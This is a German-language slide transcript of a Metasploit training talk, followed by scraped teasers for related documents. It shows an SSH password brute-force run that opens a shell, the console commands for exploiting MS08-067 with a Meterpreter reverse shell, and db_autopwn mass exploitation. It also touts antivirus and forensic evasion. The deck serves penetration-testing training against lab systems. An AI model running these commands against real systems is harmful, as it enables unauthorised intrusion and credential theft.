Metasploit Framework Unleashed beyond Metasploit

Größe: px
Ab Seite anzeigen:

Download "Metasploit Framework Unleashed beyond Metasploit"

Transkript

1 Metasploit Framework Unleashed beyond Metasploit

2 << Content << Penetration Tests vs. Vulnerability Scanning Exploiting Frameworks Metasploit History Payloads Bind- vs. Reverse Shell Meterpreter MSF in der Anwendung Benutzeroberflächen Scanning (Auxiliary Modules) Datenbanken Passwörter Teil 1 Automatisiertes Hacking Ausblicke

3 << Intro << Vulnerability Scans / Vulnerability Management Technische IT-Sicherheitsüberprüfungen ausgewählter/aller Systeme/(Anwendungen) Automatisierte Prüfungen Compliance (z.b. PCI 4 x Jährlich) Pentests Technische IT-Sicherheitsüberprüfungen ausgewählter/aller Systeme/Anwendungen Simulation eines Angreifers Manuelle und automatisierte Prüfung Kombination mehrerer Schwachstellen Eskalationskette Darstellung des realen Bedrohungsszenarios Compliance (z.b. PCI 1 x Jährlich)

4 << Intro << Was umfassen Exploiting Frameworks? Vulnerability Scanner Meist durch Schnittstellen zu externen Produkten realisiert Passwort Scanner Portscanner Service Scanner Exploits ;) Shells/Payloads (Reverse/Bind/HTTP(S)/DNS ) Agents (persistent/non persistent) Zentrale Management Konsole Scriptingfunktionalität Versch. Automatisierungsmechanismen Fuzzer und weitere Research Möglichkeiten

5 << Intro << Vorteile ~ umfangreiches Framework Einheitlich Getestet Verlässlich Automatisiert Nachteile ~ umfangreiches Framework Einheitlich Getestet Verlässlich Automatisiert Out of the box thinking? Kreativität des Testers? Know How des Testers? Werkzeug für N00bs? und Scriptkiddies?

6 << Frameworks << Core Impact von Core Security Canvas von Immunity Metasploit von Rapid 7

7 << Core Impact <<

8 << Core Impact << drag & drop

9 << Core Impact << Hilfestellung:

10 << Canvas <<

11 << History << 2003 Gründung durch HD Moore V Exploits V2.0 Framework wurde neu geschrieben (Perl) V2.2 Meterpreter V Module, Zeilen Sourcecode V3.0 Ruby V Module, Zeilen Sourcecode V Module, Zeilen Sourcecode Ende 2009 Übernahme durch Rapid 7 V3.3 - ~800 Module, ~ Zeilen Sourcecode, Rapid7 Juni 2010 V3.4 Metasploit Express (Support/Kommerzielle GUI/3k$) Metasploit wird erwachsen

12 << Everywhere<< Metasploit everywhere Linux Windows Mac OS X BSD OpenWRT IPhone/IPod Touch

13 << Payloads << Bind Payload Exploit Payload Connection Bind Shell Bad Guy

14 << Payloads << Bind Payload broken Exploit Payload Connection Bind Shell Bad Guy

15 << Payloads << Reverse Payloads Exploit Payload Connection Bad Guy

16 << Meterpreter << Verschlüsselte Verbindung (SSLv3) Viel Spaß dem IDS Läuft ausschließlich im Arbeitsspeicher Viel Spaß dem Forensiker AV Evading Viel Spaß dem Virenscanner Upload/Download Files In andere Prozesse migrieren Systeminfos - ps/getuid/migrate/getpid Meterpreter Scripte hashdump Automatisierter Post Exploiting Vorgang (run winenum)

17 << Install << Auf Backtrack wget work linux-i686.run Backup erstellen ls -d /opt/metasploit3* /opt/metasploit33-stable /opt/metasploit334 /opt/metasploit331 /opt/metasploit341 /opt/metasploit333 /opt/metasploit34-stable./framework linux-i686.run und gut is Linux allgemein ork/wiki/install_linux

18 << Update << [*] [*] Attempting to update the Metasploit Framework... [*] Updated to revision svn update At revision

19 << MSFWeb<< Wird nicht weiter gepflegt Buggy Gut für einfache Demonstrationen Gut für Dokumentationen Im Oktober aus MSF entfernt

20 << MSFWeb<< /opt/metasploit34-stable/msf3/msfweb -h [*] Warning: As of Metasploit 3.3 this interface is no longer supported: Usage: msfweb <options> OPTIONS: -a <opt> Bind to this IP address instead of loopback -d Daemonize the web server -h Help banner -p <opt> Bind to this port instead of s Automatically open the browser

21 << MSFGUI<< Wird nicht weiter gepflegt Buggy Gut für einfache Demonstrationen Gut für Dokumentationen Im Juli aus MSF entfernt und durch eine neue GUI ersetzt!

22 << MSFGUI<< Neue gui

23 << MSFCLI<<

24 << Express << Support Webgui Optimierter Pentesting Workflow Integration weiterer Tools und Scanner Automatisierung rockt

25 << Express <<

26 << CONSOLE <<

27 << CONSOLE << msf > help Core Commands ============= Command Description ? Help menu back Move back from the current context banner Display an awesome metasploit banner cd Change the current working directory color Toggle color connect Communicate with a host exit Exit the console help Help menu info Displays information about one or more module irb Drop into irb scripting mode jobs Displays and manages jobs kill kill a job load Load a framework plugin loadpath Searches for and loads modules from a path quit Exit the console resource Run the commands stored in a file route Route traffic through a session save Saves the active datastores search Searches module names and descriptions sessions Dump session listings and display information about sessions set Sets a variable to a value <snip>

28 << Scanning << connect check scanner/snmp/community scanner/smb/smb_login scanner/smb/smb_version scanner/smb/smb_enumusers scanner/smb/smb_enumshares auxiliary/gather/dns_enum auxiliary/scanner/discovery/arp_sweep scanner/vnc/vnc_none_auth Nur ein sehr kleiner Auszug aller verfügbaren Module msf > search -t auxiliary server/browser_autopwn Aber das ist eine andere Geschichte

29 << Scanning << Metasploit ist kein Allheilmittel! Connect - netcat, Nmap SNMP-Stuff - snmpcheck.pl, Nmap SMB Stuff - samrdump.py, Nmap dns_enum - dig usw. arp_sweep - Nmap vnc_none_auth - Nmap, MSFv2 (realvnc_41_bypass)

30 << Scanning << Passwort Fu msf > search -t auxiliary _login [*] Searching loaded modules for pattern '_login'... Auxiliary ========= Name Disclosure Date Rank Description admin/oracle/oracle_login normal Oracle Account Discovery. scanner/ftp/ftp_login normal FTP Authentication Scanner scanner/http/axis_login normal Apache Axis2 v1.4.1 Brute Force Utility scanner/http/frontpage_login normal FrontPage Server Extensions Login Utility scanner/http/http_login normal HTTP Login Utility scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility scanner/http/wordpress_login_enum normal Wordpress Brute Force and User Enumeration Utility scanner/lotus/lotus_domino_login normal Lotus Domino Brute Force Utility scanner/mssql/mssql_login normal MSSQL Login Utility scanner/mysql/mysql_login normal MySQL Login Utility scanner/postgres/postgres_login normal PostgreSQL Login Utility scanner/smb/smb_login normal SMB Login Check Scanner scanner/ssh/ssh_login normal SSH Login Check Scanner scanner/ssh/ssh_login_pubkey normal SSH Public Key Login Scanner scanner/telnet/telnet_login normal Telnet Login Check Scanner

31 << Scanning << Passwort Fu msf auxiliary(ssh_login) > run [*] : SSH - Starting buteforce [*] : SSH - Trying: username: 'sysadm' with password: '' [-] : SSH - Failed: 'sysadm':'' [*] : SSH - Trying: username: 'sysadm' with password: '777777' [*] Command shell session 1 opened ( : > :12345) at Mon Nov 01 17:02: [+] : SSH - Success: 'sysadm':'777777' 'uid=1000(sysadm) gid=1000(sysadm) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(sysadm) Linux pown-me #1 SMP Tue Mar 9 17:35:51 UTC 2010 i686 GNU/Linux ' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

32 << Datenbanken << msf > search -t auxiliary mssql mysql oracle postgre admin/mssql/mssql_enum admin/mssql/mssql_exec admin/mysql/mysql_enum admin/oracle/oracle_login admin/oracle/oraenum admin/oracle/sid_brute scanner/mssql/mssql_login scanner/mysql/mysql_login scanner/mysql/mysql_version admin/postgres/postgres_readfile

33 << Exploiting<< msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set LHOST LHOST => msf exploit(ms08_067_netapi) > set RHOST RHOST => msf exploit(ms08_067_netapi) > exploit

34 << auto hacking << msf > db_import db_import db_import_ip_list db_import_nessus_nbe db_import_nmap_xml db_import_amap_mlog db_import_msfe_xml db_import_nessus_xml db_import_qualys_xml msf > db_autopwn

35 << auto hacking << msf > db_driver msf > db_create [database] / db_connect msf > db_import_xyz msf > db_hosts msf > db_services msf > db_vulns msf > db_autopwn [*] Usage: db_autopwn [options] <snip> -t Show all matching exploit modules -x Select modules based on vuln. references -p Select modules based on open ports -e Launch exploits against all targets -R [rank] Only run modules with a minimal rank <snip>

36 << auto hacking << msf > db_driver msf > db_create [database] / db_connect msf > load nexpose msf > nexpose_connect msf > nexpose_scan msf > db_autopwn t -x

37 << Trockenübung << Metasploitable db_autopwn/msf express rockt ;) Windows XP for free ;) Fedora Core 4 Ubuntu 7.04 Alte Windows und Linux Systeme

38 << and now? << Jetzt hacking the lab Nachmittag: Fancy client sidekung fu SMTX client sidekung fu part 2 M1k3 meterpreter kung fu

39 << hacking the lab << Information is everything DNS Analyse SNMP Scans SMB Scans Portscans (Nmap/interne Module) Findet die Datenbanken Password attacks (SSH/Telnet/DB/SMB/.) Findet Systeme die auf MS anfällig sind VNC Analyse Exploitet was geht

40 << thx << Contact:

German Metasploit Framework Tutorial 16. August 2005 dav

German Metasploit Framework Tutorial 16. August 2005 dav German Metasploit Framework Tutorial 16. August 2005 dav Inhalt 1. Einleitung 2. Exploit Datenbank 2.1. Neue Exploits integrieren 3. Payload Datenbank 4. Konfiguration und Anwendungen eines Exploits 4.1.

Mehr

Penetration Testing mit MetaSploit

Penetration Testing mit MetaSploit Penetration Testing mit MetaSploit Stefan Schumacher www.sicherheitsforschung-magdeburg.de Chemnitzer Linux-Tage 2012 Über Mich Direktor des Magdeburger Instituts für Sicherheitsforschung Forschungsprogramme

Mehr

13.1 Vorbereitungsarbeiten und Bedienung des Frameworks

13.1 Vorbereitungsarbeiten und Bedienung des Frameworks 543 Dieses Kapitel stellt eine Zusammenfassung der häufigsten Tätigkeiten und verwendeten Befehle in Kurzform dar. Diese Darstellung ist nicht vollständig und soll Ihnen in erster Linie wichtige Anhaltspunkte

Mehr

WMAP Metasploit 3.2 Module für Pentester von Webapplikationen. OWASP Frankfurt, 25.11.08. The OWASP Foundation http://www.owasp.

WMAP Metasploit 3.2 Module für Pentester von Webapplikationen. OWASP Frankfurt, 25.11.08. The OWASP Foundation http://www.owasp. Germany 2008 Conference http://www.owasp.org/index.php/germany WMAP Metasploit 3.2 Module für Pentester von Webapplikationen Frankfurt, 25.11.08 Hans-Martin Münch it.sec GmbH & Co KG mmuench@it-sec.de

Mehr

ANGRIFF. Metasploit. Exploiting Framework the basics

ANGRIFF. Metasploit. Exploiting Framework the basics ANGRIFF MICHAEL MESSNER Metasploit Exploiting Framework the basics Schwierigkeitsgrad: Vor allem im professionellen Pentesting Umfeld nehmen Exploiting Frameworks mittlerweile eine nicht mehr wegzudenkende

Mehr

Penetration Testing mit Metasploit

Penetration Testing mit Metasploit Penetration Testing mit Metasploit Eine praktische Einführung von Frank Neugebauer 2., akt. u. erw. Aufl. Penetration Testing mit Metasploit Neugebauer schnell und portofrei erhältlich bei beck-shop.de

Mehr

Breaking Enterprise via XSS

Breaking Enterprise via XSS Michael Messner Senior IT-Security Consultant Fulda, November 2011 Breaking Enterprise via XSS www.integralis.com Agenda Client Sides Was ist Cross Site Scripting (XSS)? Live Demo XSSF Pivoting Privilege

Mehr

login: password: exit logout Strg+Alt+Backspace passwd passwd $ passwd Changing password for user (current) UNIX password: New UNIX password: Retype new UNIX password: passwd: all authentication tokens

Mehr

6.6 Erweiterte Metasploit-Resource-Skripte

6.6 Erweiterte Metasploit-Resource-Skripte 264 6 Automatisierungsmechanismen und Integration von 3rd-Party-Scannern durch die vorhandene Benutzerinteraktion häufig essenziell, eine möglichst schnelle und sichere Prozessmigration durchzuführen.

Mehr

Michael Messner www.dpunkt.de/plus

Michael Messner www.dpunkt.de/plus Michael Messner arbeitet als IT Security Consultant bei der Corporate Technology der Siemens AG in München und führt dort technische Sicherheitsanalysen und Penetrationstests durch. Neben der technischen

Mehr

NG-NAC, Auf der Weg zu kontinuierlichem

NG-NAC, Auf der Weg zu kontinuierlichem NG-NAC, Auf der Weg zu kontinuierlichem Monitoring, Sichtbarkeit und Problembehebung 2013 ForeScout Technologies, Page 1 Matthias Ems, Markus Auer, 2014 ForeScout Technologies, Page 1 Director IT Security

Mehr

5 Meterpreter-Kung-Fu Die Post-Exploitation-Phase

5 Meterpreter-Kung-Fu Die Post-Exploitation-Phase 212 5 Meterpreter-Kung-Fu Die Post-Exploitation-Phase Abb. 5 5 Erstellter Benutzer mit Domain-Admin-Berechtigungen 5.8 Pivoting Konnte im Rahmen eines Penetrationstests ein System mit mehreren Netzwerkkarten

Mehr

Cameraserver mini. commissioning. Ihre Vision ist unsere Aufgabe

Cameraserver mini. commissioning. Ihre Vision ist unsere Aufgabe Cameraserver mini commissioning Page 1 Cameraserver - commissioning Contents 1. Plug IN... 3 2. Turn ON... 3 3. Network configuration... 4 4. Client-Installation... 6 4.1 Desktop Client... 6 4.2 Silverlight

Mehr

ALL1681 Wireless 802.11g Powerline Router Quick Installation Guide

ALL1681 Wireless 802.11g Powerline Router Quick Installation Guide ALL1681 Wireless 802.11g Powerline Router Quick Installation Guide 1 SET ALL1681 Upon you receive your wireless Router, please check that the following contents are packaged: - Powerline Wireless Router

Mehr

Metasploit 2 the max

Metasploit 2 the max ANGRIFF MICHAEL MESSNER Metasploit 2 the max Schwierigkeitsgrad: Folgendes Szenario: Sie kommen zu einem Auftraggeber, um einen internen Penetrationstest durchzuführen. Nachdem Sie ihre Pentesting Frameworks

Mehr

Willkommen zum Security Day 2012

Willkommen zum Security Day 2012 Willkommen zum Security Day 2012 Willkommen zum ITSeCX 2012 Workshop System Exploitation Workshop Überblick Metasploit Framework kennenlernen Awareness und Wissen über moderne Angriffswerkzeuge schärfen

Mehr

p^db=`oj===pìééçêíáåñçêã~íáçå=

p^db=`oj===pìééçêíáåñçêã~íáçå= p^db=`oj===pìééçêíáåñçêã~íáçå= Error: "Could not connect to the SQL Server Instance" or "Failed to open a connection to the database." When you attempt to launch ACT! by Sage or ACT by Sage Premium for

Mehr

Löschen eines erkannten aber noch nicht konfigurierten Laufwerks

Löschen eines erkannten aber noch nicht konfigurierten Laufwerks NetWorker - Allgemein Tip 359, Seite 1/6 Löschen eines erkannten aber noch nicht konfigurierten Laufwerks Seit der Version 7.3.0 ist es sehr einfach, vorhandene Sicherungslaufwerke durch den NetWorker

Mehr

BTD Antivirus Evasion: Von der Idee zum PoC. Daniel Sauder SySS GmbH

BTD Antivirus Evasion: Von der Idee zum PoC. Daniel Sauder SySS GmbH BTD Antivirus Evasion: Von der Idee zum PoC Daniel Sauder SySS GmbH WHOAMI IT Security Consultant bei der SySS GmbH Vier Jahre Windows Admin Interesse an Mobile Apps, Web Apps, Windows Hacking u.v.m. OSCP

Mehr

vii Inhaltsverzeichnis 1 Einleitung 1

vii Inhaltsverzeichnis 1 Einleitung 1 vii 1 Einleitung 1 1.1 Was ist das Metasploit-Framework?............................. 2 1.2 Ziel des Buches............................................. 2 1.3 Wer sollte dieses Buch lesen?...................................

Mehr

Penetrationstests mit Metasploit

Penetrationstests mit Metasploit Michael Kohl Linuxwochenende 2011 24 September 2011 Outline 1 Einleitung 2 Penetration Testing 3 Metasploit 4 Demo 5 Ressourcen Über mich Früher: Linux/Unix Admin / Systems Engineer Jetzt: Rails-Entwickler,

Mehr

p^db=`oj===pìééçêíáåñçêã~íáçå=

p^db=`oj===pìééçêíáåñçêã~íáçå= p^db=`oj===pìééçêíáåñçêã~íáçå= How to Disable User Account Control (UAC) in Windows Vista You are attempting to install or uninstall ACT! when Windows does not allow you access to needed files or folders.

Mehr

Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools

Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools IT-Sicherheit heute - Angriffe, Schutzmechanismen, Umsetzung Reale Angriffsszenarien Typische Regellücken bei Firewalls,, Testtools jochen.schlichting@secorvo.de Seite 1 Inhalt Einführung: Typische Angriffe

Mehr

David Kennedy, Jim O'Gorman, Devon Kearns, Mati Aharoni. Metasploit. Übersetzung aus dem amerikanischen Englisch von Knut Lorenzen.

David Kennedy, Jim O'Gorman, Devon Kearns, Mati Aharoni. Metasploit. Übersetzung aus dem amerikanischen Englisch von Knut Lorenzen. David Kennedy, Jim O'Gorman, Devon Kearns, Mati Aharoni Metasploit Übersetzung aus dem amerikanischen Englisch von Knut Lorenzen mitp haltsverzeichnis Geleitwort von HD Moore 13 Vorwort 17 Einführung 21

Mehr

NEWSLETTER. FileDirector Version 2.5 Novelties. Filing system designer. Filing system in WinClient

NEWSLETTER. FileDirector Version 2.5 Novelties. Filing system designer. Filing system in WinClient Filing system designer FileDirector Version 2.5 Novelties FileDirector offers an easy way to design the filing system in WinClient. The filing system provides an Explorer-like structure in WinClient. The

Mehr

Sysadmin Day 2010. Windows & Linux. Ralf Wigand. MVP Directory Services KIT (Universität Karlsruhe)

Sysadmin Day 2010. Windows & Linux. Ralf Wigand. MVP Directory Services KIT (Universität Karlsruhe) Sysadmin Day 2010 Windows & Linux just good friends? friends!!! Ralf Wigand MVP Directory Services KIT (Universität Karlsruhe) Voraussetzungen Sie haben ein Active Directory Sie haben einen Linux Client

Mehr

OEDIV SSL-VPN Portal Access for externals

OEDIV SSL-VPN Portal Access for externals OEDIV SSL-VPN Portal Access for externals Abteilung Serverbetreuung Andre Landwehr Date 31.07.2013 Version 1.2 Seite 1 von 9 Versionshistorie Version Datum Autor Bemerkung 1.0 06.08.2011 A. Landwehr Initial

Mehr

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung 6. Zone Defense 6.1 Einleitung Im Folgenden wird die Konfiguration von Zone Defense gezeigt. Sie verwenden einen Rechner für die Administration, den anderen für Ihre Tests. In der Firewall können Sie entweder

Mehr

MySQL Queries on "Nmap Results"

MySQL Queries on Nmap Results MySQL Queries on "Nmap Results" SQL Abfragen auf Nmap Ergebnisse Ivan Bütler 31. August 2009 Wer den Portscanner "NMAP" häufig benutzt weiss, dass die Auswertung von grossen Scans mit vielen C- oder sogar

Mehr

Free IPA (Identity Policy - Audit)

Free IPA (Identity Policy - Audit) Free IPA (Identity Policy - Audit) OSDCM: User Management Jürgen Brunk München, 06.05.2014 Agenda 1. Was ist Free IPA? 2. Übersicht 3. CLI und Web-GUI 4. Windows AD Anbindung 5. Framework 6. Umgebung 7.

Mehr

ANGRIFF. Metasploit Fixing the framework. All diese Automatismen helfen allerdings

ANGRIFF. Metasploit Fixing the framework. All diese Automatismen helfen allerdings ANGRIFF MICHAEL MESSNER Metasploit Fixing the framework Schwierigkeitsgrad: Die praktische Anwendung des Metasploit Exploiting Frameworks bietet enorme Möglichkeiten zur Vereinfachung eines Pentests. Dazu

Mehr

sscd ist die Serverkomponente zum ssc Werkzeug zum sammeln von Aufnahmen.

sscd ist die Serverkomponente zum ssc Werkzeug zum sammeln von Aufnahmen. Das sscd Handbuch Das sscd Handbuch by Peter H. Grasch Copyright 2009-2010 Peter Grasch sscd ist die Serverkomponente zum ssc Werkzeug zum sammeln von Aufnahmen. Permission is granted to copy, distribute

Mehr

Hier folgt eine kurze Aufstellung über die verwendete Architekur. Die Angaben sind ohne Gewähr für Vollständigkeit oder vollständige Richtigkeit.

Hier folgt eine kurze Aufstellung über die verwendete Architekur. Die Angaben sind ohne Gewähr für Vollständigkeit oder vollständige Richtigkeit. 1. ODBC 1.1 Problemstellung Die Informationen über die Microsoft SQL Server Datenbanken sind zur Zeit nicht auf der TIMD Website verfügbar. Der Grund ist, dass kein Interface zur Abfrage der benötigten

Mehr

Ralf M. Schnell. Technical Evangelist Microsoft Deutschland GmbH

Ralf M. Schnell. Technical Evangelist Microsoft Deutschland GmbH Ralf M. Schnell Technical Evangelist Microsoft Deutschland GmbH Was ist Server Core? Warum Server Core? Was kann man damit machen? Was kann man damit nicht machen? Server Core: Installation Server Core:

Mehr

Netzwerkorientierte Anwendungssicherheit

Netzwerkorientierte Anwendungssicherheit Netzwerkorientierte Anwendungssicherheit Möglichkeiten der Korrelation von Schwachstelleninformationen von Vulnerability Scannern mit Exploit- und Schwachstellendatenbanken Betreuer: Helmut Kaufmann, Bernhard

Mehr

Linux basierendes NAS auf Seagate Goflex Net installieren. Christian Eppler 21162, Stefan Möbius 21165

Linux basierendes NAS auf Seagate Goflex Net installieren. Christian Eppler 21162, Stefan Möbius 21165 Linux basierendes NAS auf Seagate Goflex Net installieren Christian Eppler 21162, Stefan Möbius 21165 Inhaltsverzeichnis Wieso das Ganze? Nachteile Pogoplug/Debian Vorteile Pogoplug/Debian Wieso diese

Mehr

Frequently asked Questions for Kaercher Citrix (apps.kaercher.com)

Frequently asked Questions for Kaercher Citrix (apps.kaercher.com) Frequently asked Questions for Kaercher Citrix (apps.kaercher.com) Inhalt Content Citrix-Anmeldung Login to Citrix Was bedeutet PIN und Token (bei Anmeldungen aus dem Internet)? What does PIN and Token

Mehr

Wo finde ich die Software? - Jedem ProLiant Server liegt eine Management CD bei. - Über die Internetseite http://www.hp.

Wo finde ich die Software? - Jedem ProLiant Server liegt eine Management CD bei. - Über die Internetseite http://www.hp. Erfahrungen mit dem Insight Manager von HP Dipl. Ing. Elektrotechnik (FH) - Automatisierungs- / Regelungstechnik DV-Spezialist Landesbank Rheinland-Pfalz Abteilung 2-351 Große Bleiche 54-56 55098 Mainz

Mehr

Das Metasploit Framework

Das Metasploit Framework Das Metasploit Framework Eine Einführung in das Penetration Testing Framework Maximilian Blenk Martin Hartmann Sommersemester 15 Betreuender Professor: Prof. Dr. Christoph Karg Inhaltsverzeichnis Listings........................................

Mehr

Load balancing Router with / mit DMZ

Load balancing Router with / mit DMZ ALL7000 Load balancing Router with / mit DMZ Deutsch Seite 3 English Page 10 ALL7000 Quick Installation Guide / Express Setup ALL7000 Quick Installation Guide / Express Setup - 2 - Hardware Beschreibung

Mehr

Effizienz im Vor-Ort-Service

Effizienz im Vor-Ort-Service Installation: Anleitung SatWork Integrierte Auftragsabwicklung & -Disposition Februar 2012 Disposition & Auftragsabwicklung Effizienz im Vor-Ort-Service Disclaimer Vertraulichkeit Der Inhalt dieses Dokuments

Mehr

Anlegen von Entwicklungsumgebungen per Vagrant & Chef

Anlegen von Entwicklungsumgebungen per Vagrant & Chef 13. August 2015 Inhalt 1 Überblick Vagrant 2 Vagrant Download unter https://www.vagrantup.com/ Konguration per Vagrantle Listing 1: Vagrantle Vagrant. configure ("2") do config config. vm. box = " vivid64

Mehr

150Mbps Micro Wireless N USB Adapter

150Mbps Micro Wireless N USB Adapter 150Mbps Micro Wireless N USB Adapter TEW-648UBM ŸAnleitung zur Schnellinstallation (1) ŸTroubleshooting (6) 1.11 1. Bevor Sie anfangen Packungsinhalt ŸTEW-648UBM ŸCD-ROM (Dienstprogramm & Bedienungsanleitung)

Mehr

SNMP Kommandos für Alcatel-Lucent OmniSwitch Produkte

SNMP Kommandos für Alcatel-Lucent OmniSwitch Produkte 802.1x / MAC Address Authentication Abfragen der Port-Mobility Tabelle snmpwalk -v 2c -c public 192.168.10.1 1.3.6.1.4.1.6486.800.1.2.1.4.1.1.2.1 Abfragen des Mobility Settings für einen Port (in diesem

Mehr

How to install freesshd

How to install freesshd Enthaltene Funktionen - Installation - Benutzer anlegen - Verbindung testen How to install freesshd 1. Installation von freesshd - Falls noch nicht vorhanden, können Sie das Freeware Programm unter folgendem

Mehr

300Mbps Wireless Outdoor PoE Access Point/Bridge Quick Installation Guide

300Mbps Wireless Outdoor PoE Access Point/Bridge Quick Installation Guide LevelOne WAB-5120 300Mbps Wireless Outdoor PoE Access Point/Bridge Quick Installation Guide English Deutsch - 1 - Table of Content English... - 3 - Deutsch... - 9 - This guide covers only the most common

Mehr

Magdeburger Journal zur Sicherheitsforschung. Penetrationstests mit Metasploit

Magdeburger Journal zur Sicherheitsforschung. Penetrationstests mit Metasploit Magdeburger Journal zur Sicherheitsforschung Gegründet 2011 ISSN: 2192-4260 Herausgegeben von Stefan Schumacher und Jan W. Meine Meine Verlag Wissenschafts-, Sach- und Fachbuchverlag, Magdeburg Dieser

Mehr

German English Firmware translation for T-Sinus 154 Access Point

German English Firmware translation for T-Sinus 154 Access Point German English Firmware translation for T-Sinus 154 Access Point Konfigurationsprogramm Configuration program (english translation italic type) Dieses Programm ermöglicht Ihnen Einstellungen in Ihrem Wireless

Mehr

Konfiguration Zentyal 3.3 Inhaltsverzeichnis

Konfiguration Zentyal 3.3 Inhaltsverzeichnis Konfiguration Zentyal 3.3 Inhaltsverzeichnis Installation... 2 Grundkomponenten... 5 Grundkonfiguration... 6 Netzwerk... 6 Domain... 7 Updates installieren... 8 DNS konfigurieren... 10 Anpassungen in DNS

Mehr

Testen von System- & Netzwerksicherheit. Seminar IT-Security HU Berlin 2004, Andreas Dittrich & Philipp Reinecke

Testen von System- & Netzwerksicherheit. Seminar IT-Security HU Berlin 2004, Andreas Dittrich & Philipp Reinecke 1 Testen von System- & Netzwerksicherheit 2 Gliederung Sicherheit im Allgemeinen Testbereiche Methodik und Standards Hilfsmittel im Speziellen nessus nmap Szenario im praktischen Teil 3 Fragen zur Sicherheit

Mehr

Plesk installieren. Damit die Installation klappt, muss Linux zuvor mit einer Minimalinstallation installiert worden sein!

Plesk installieren. Damit die Installation klappt, muss Linux zuvor mit einer Minimalinstallation installiert worden sein! So wird Plesk installiert: Damit die Installation klappt, muss Linux zuvor mit einer Minimalinstallation installiert worden sein! 1. Einloggen per SSH auf den Linux-Server 2. Betriebssystem Anpassungen:

Mehr

Rechnernetze. 6. Übung

Rechnernetze. 6. Übung Hochschule für Technik und Wirtschaft Studiengang Kommunikationsinformatik Prof. Dr. Ing. Damian Weber Rechnernetze 6. Übung Aufgabe 1 (TCP Client) Der ECHO Service eines Hosts wird für die Protokolle

Mehr

ONLINE LICENCE GENERATOR

ONLINE LICENCE GENERATOR Index Introduction... 2 Change language of the User Interface... 3 Menubar... 4 Sold Software... 5 Explanations of the choices:... 5 Call of a licence:... 7 Last query step... 9 Call multiple licenses:...

Mehr

Java Application 1 Java Application 2. JDBC DriverManager. JDBC-ODBC Br idge. ODBC Driver Manager. Dr iver C. Dr iver D.

Java Application 1 Java Application 2. JDBC DriverManager. JDBC-ODBC Br idge. ODBC Driver Manager. Dr iver C. Dr iver D. 1 Copyright 1996-1997 by Axel T. Schreiner. All Rights Reserved. 7 Datenbankzugriff Prinzip Dieser Abschnitt beschäftigt sich mit dem Paket java.sql, das eine SQL-Schnittstelle für Java verkapselt. Java-Programme

Mehr

AnyWeb AG 2008 www.anyweb.ch

AnyWeb AG 2008 www.anyweb.ch OMW 8.1- What s new System- Applikations- und Servicemanagement Agenda Was ist OMW HTTPS Agent Remote Agent Installation User Role Based Service View Custom Message Attributes Maintenace Mode Weitere Erweiterungen

Mehr

Sicherheit von Webapplikationen Sichere Web-Anwendungen

Sicherheit von Webapplikationen Sichere Web-Anwendungen Sicherheit von Webapplikationen Sichere Web-Anwendungen Daniel Szameitat Agenda 2 Web Technologien l HTTP(Hypertext Transfer Protocol): zustandsloses Protokoll über TCP auf Port 80 HTTPS Verschlüsselt

Mehr

How-To-Do. Communication to Siemens OPC Server via Ethernet

How-To-Do. Communication to Siemens OPC Server via Ethernet How-To-Do Communication to Siemens OPC Server via Content 1 General... 2 1.1 Information... 2 1.2 Reference... 2 2 Configuration of the PC Station... 3 2.1 Create a new Project... 3 2.2 Insert the PC Station...

Mehr

MySQL 101 Wie man einen MySQL-Server am besten absichert

MySQL 101 Wie man einen MySQL-Server am besten absichert MySQL 101 Wie man einen MySQL-Server am besten absichert Simon Bailey simon.bailey@uibk.ac.at Version 1.1 23. Februar 2003 Change History 21. Jänner 2003: Version 1.0 23. Februar 2002: Version 1.1 Diverse

Mehr

Vortrag SASS Funktionen #ck2016. Was ist SASS?

Vortrag SASS Funktionen #ck2016. Was ist SASS? Vortrag SASS Funktionen #ck2016 Was ist SASS? Syntactically Awesome Stylesheets = Meta-Sprache DRY Don't Repeat Yourself Der Vorteil von SASS liegt in den zusätzlichen Features die es mit sich bringt,

Mehr

Therefore the respective option of the password-protected menu ("UPDATE TUBE DATA BASE") has to be selected:

Therefore the respective option of the password-protected menu (UPDATE TUBE DATA BASE) has to be selected: ENGLISH Version Update Dräger X-act 5000 ("UPDATE TUBE DATA BASE") The "BARCODE OPERATION AIR" mode is used to automatically transfer the needed measurement parameters to the instrument. The Dräger X-act

Mehr

CONTROL-M. CONTROL-M Tipps&Tricks. Martin Dienstl Principal Software Consultant martin_dienstl@bmc.com

CONTROL-M. CONTROL-M Tipps&Tricks. Martin Dienstl Principal Software Consultant martin_dienstl@bmc.com CONTROL-M CONTROL-M Tipps&Tricks Martin Dienstl Principal Software Consultant martin_dienstl@bmc.com CONTROL-M Tipps&Tricks Topics Usability Nützliche Systemparameter CCM Nützliche Systemparameter CONTROL-M/Server

Mehr

Powershell DSC Oliver Ryf

Powershell DSC Oliver Ryf 1 Powershell DSC Oliver Ryf Partner: 2 Agenda Begrüssung Vorstellung Referent PowerShell Desired State Configuration F&A Weiterführende Kurse 3 Vorstellung Referent Seit 1991 IT-Trainer 1995 MCSE und MCT

Mehr

Isabel Arnold CICS Technical Sales Germany Isabel.arnold@de.ibm.com. z/os Explorer. 2014 IBM Corporation

Isabel Arnold CICS Technical Sales Germany Isabel.arnold@de.ibm.com. z/os Explorer. 2014 IBM Corporation Isabel Arnold CICS Technical Sales Germany Isabel.arnold@de.ibm.com z/os Explorer Agenda Introduction and Background Why do you want z/os Explorer? What does z/os Explorer do? z/os Resource Management

Mehr

Damit die Installation klappt, muss Linux zuvor mit einer Minimalinstallation installiert worden sein!

Damit die Installation klappt, muss Linux zuvor mit einer Minimalinstallation installiert worden sein! Plesk installieren So wird Plesk installiert: Damit die Installation klappt, muss Linux zuvor mit einer Minimalinstallation installiert worden sein! 1. Einloggen per SSH auf den Linux-Server 2. Betriebssystem

Mehr

Installation MySQL Replikationsserver 5.6.12

Installation MySQL Replikationsserver 5.6.12 Ergänzen Konfigurationsdatei my.ini auf Master-Server:!!! softgate gmbh!!! Master und Slave binary logging format - mixed recommended binlog_format = ROW Enabling this option causes the master to write

Mehr
